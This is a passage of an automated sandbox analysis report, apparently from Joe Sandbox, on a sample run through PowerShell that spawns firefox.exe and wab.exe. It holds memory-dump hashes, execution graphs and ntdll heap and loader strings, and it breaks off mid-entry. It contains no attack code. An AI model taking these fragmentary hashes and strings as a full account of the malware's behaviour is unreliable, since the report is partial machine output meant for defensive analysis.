                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:07:55:00
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff73feb0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:07:55:01
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Reset < >
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e3b7777b456455aa6263002bedaa854d3fc06f493493f5b4ea02878182c531b
                                                              • Instruction ID: 6459f9dfbfa7cc7889004c75274d012fc771ac30367b010c32b25630d76fd544
                                                              • Opcode Fuzzy Hash: 1e3b7777b456455aa6263002bedaa854d3fc06f493493f5b4ea02878182c531b
                                                              • Instruction Fuzzy Hash: E3F19430918A8E8FEBA8DF28C8557E937E1FF55354F04426ED84DC7291CB38A945CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4886302d24dd6f755974fca8a43cb905576463c70596603d055ba85d8f6e637
                                                              • Instruction ID: 69baded0a4eb321274e340ffce2e12c2e10502b14554be96397c68cbc380e71b
                                                              • Opcode Fuzzy Hash: c4886302d24dd6f755974fca8a43cb905576463c70596603d055ba85d8f6e637
                                                              • Instruction Fuzzy Hash: 48E1A330908A8E8FEBA8DF28CC557F977E1FB55350F14426AD84DC7291DE78A941CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076920188.00007FF887A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: b&
                                                              • API String ID: 0-2767624833
                                                              • Opcode ID: 2c17b48702399054868ec9915da8e4fb69d5575e1552c040393a29e0f73061dc
                                                              • Instruction ID: 67e4311d342a83d0b5ae5f297b1713c9104d331b4d5a1c536ce181b55a359940
                                                              • Opcode Fuzzy Hash: 2c17b48702399054868ec9915da8e4fb69d5575e1552c040393a29e0f73061dc
                                                              • Instruction Fuzzy Hash: B6A1E361E4DA8A4FE7A9DB2858526BC66F2FF55B90B6801BAC01DC31D2DF18F900C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db1d3e0d14c87ba050bd5fea85e81e00f830551b7375e0f6a61eda4ad23482
                                                              • Instruction ID: c90fd8a51c3e498cdb83745e97076c368eef18836c1d44a8ace9faf5bb26093e
                                                              • Opcode Fuzzy Hash: 30db1d3e0d14c87ba050bd5fea85e81e00f830551b7375e0f6a61eda4ad23482
                                                              • Instruction Fuzzy Hash: 22812E70A1CA4A4FE798EB1CC885BB977E1FF95351B10057DD08AC3296D929FC46C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076920188.00007FF887A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aabda216f460b7a39514d148caea81acf26212875afcff66b8f1f17ec8d6dfd1
                                                              • Instruction ID: eabd1cd586eeec7185996556f2196b7d7c777621d910d0f243faa5e9455d50ff
                                                              • Opcode Fuzzy Hash: aabda216f460b7a39514d148caea81acf26212875afcff66b8f1f17ec8d6dfd1
                                                              • Instruction Fuzzy Hash: 9151C062D5DA864BE2A9D72858626BC6AF2FF55AE4B6801B9C05CC31D2DE18FD00C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076920188.00007FF887A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7540b1123efa664d48c2c1fd00869df213e6dc702dde3e146701a47280042c33
                                                              • Instruction ID: 5136970b780cd52874c7348e467a0490cbf29356528018e3cc987eb2d79f9c7e
                                                              • Opcode Fuzzy Hash: 7540b1123efa664d48c2c1fd00869df213e6dc702dde3e146701a47280042c33
                                                              • Instruction Fuzzy Hash: 9E112922D5DA9A1FF2F5D658281A1BC66E2FF557A1B6801FAD40CD31C3DD09BC008382
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction ID: 4d1bdf2cd6c7b782772ba3cef12691d8b5ab7d7588a456517f2beaabed9f544a
                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction Fuzzy Hash: B501A73011CB0D8FD744EF0CE455AA5B3E0FB85360F10052DE58AC3691D636E881CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52e9e326878bd00bf46b55bc1a943b98308f0c5119365de1a0b5adc22c74ed99
                                                              • Instruction ID: 90885f3e7ef4e49c160200757ac6bf3e35dc6d2f943e3997673a40099199ecff
                                                              • Opcode Fuzzy Hash: 52e9e326878bd00bf46b55bc1a943b98308f0c5119365de1a0b5adc22c74ed99
                                                              • Instruction Fuzzy Hash: 75317677A0C1A39FE210FBEDF8A59EA3B54DF9127A71801B7D1C8C5093D91C504B86A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vwk
                                                              • API String ID: 0-1924164325
                                                              • Opcode ID: bdfd408d35431e5fbf63754e4f7dc68933cc7b8e5a170a72e43f99503d4a9fca
                                                              • Instruction ID: 2e8a074aa09a7010f845a130e88b25b68c80b0add4f99466772fb5e2ab1a7591
                                                              • Opcode Fuzzy Hash: bdfd408d35431e5fbf63754e4f7dc68933cc7b8e5a170a72e43f99503d4a9fca
                                                              • Instruction Fuzzy Hash: AFB17270E002199FDF14CFAAC8857EEBBF2AF88305F14852AD815E7354EB74A845CB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Nwk$h]wk$h]wk$h]wk$Iwk
                                                              • API String ID: 0-3734436452
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h]wk$Iwk
                                                              • API String ID: 0-2953020780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927012816.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_2b8d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927012816.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_2b8d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927012816.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_2b8d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:0%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:40%
                                                              Total number of Nodes:5
                                                              Total number of Limit Nodes:1
                                                              execution_graph 64518 20252c70 LdrInitializeThunk 64520 20252c00 64522 20252c0a 64520->64522 64523 20252c11 64522->64523 64524 20252c1f LdrInitializeThunk 64522->64524

                                                              Control-flow Graph

                                                              control_flow_graph 6 202535c0-202535cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 4 20252c70-20252c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 5 20252df0-20252dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 20252c0a-20252c0f 1 20252c11-20252c18 0->1 2 20252c1f-20252c26 LdrInitializeThunk 0->2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              • Critical section debug info address, xrefs: 2028541F, 2028552E
                                                              • corrupted critical section, xrefs: 202854C2
                                                              • Critical section address, xrefs: 20285425, 202854BC, 20285534
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 202854E2
                                                              • Critical section address., xrefs: 20285502
                                                              • Thread identifier, xrefs: 2028553A
                                                              • double initialized or corrupted critical section, xrefs: 20285508
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2028540A, 20285496, 20285519
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 202854CE
                                                              • 8, xrefs: 202852E3
                                                              • undeleted critical section in freed memory, xrefs: 2028542B
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 20285543
                                                              • Address of the debug info found in the active list., xrefs: 202854AE, 202854FA
                                                              • Invalid debug info address of this critical section, xrefs: 202854B6
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/# $MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3237199910
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • @, xrefs: 2020D0FD
                                                              • H/# , xrefs: 2026A843
                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2020D0CF
                                                              • @, xrefs: 2020D313
                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 2020D196
                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2020D146
                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2020D262
                                                              • @, xrefs: 2020D2AF
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2020D2C3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/# $Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                              • API String ID: 0-3532747180
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                              • API String ID: 0-3063724069
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
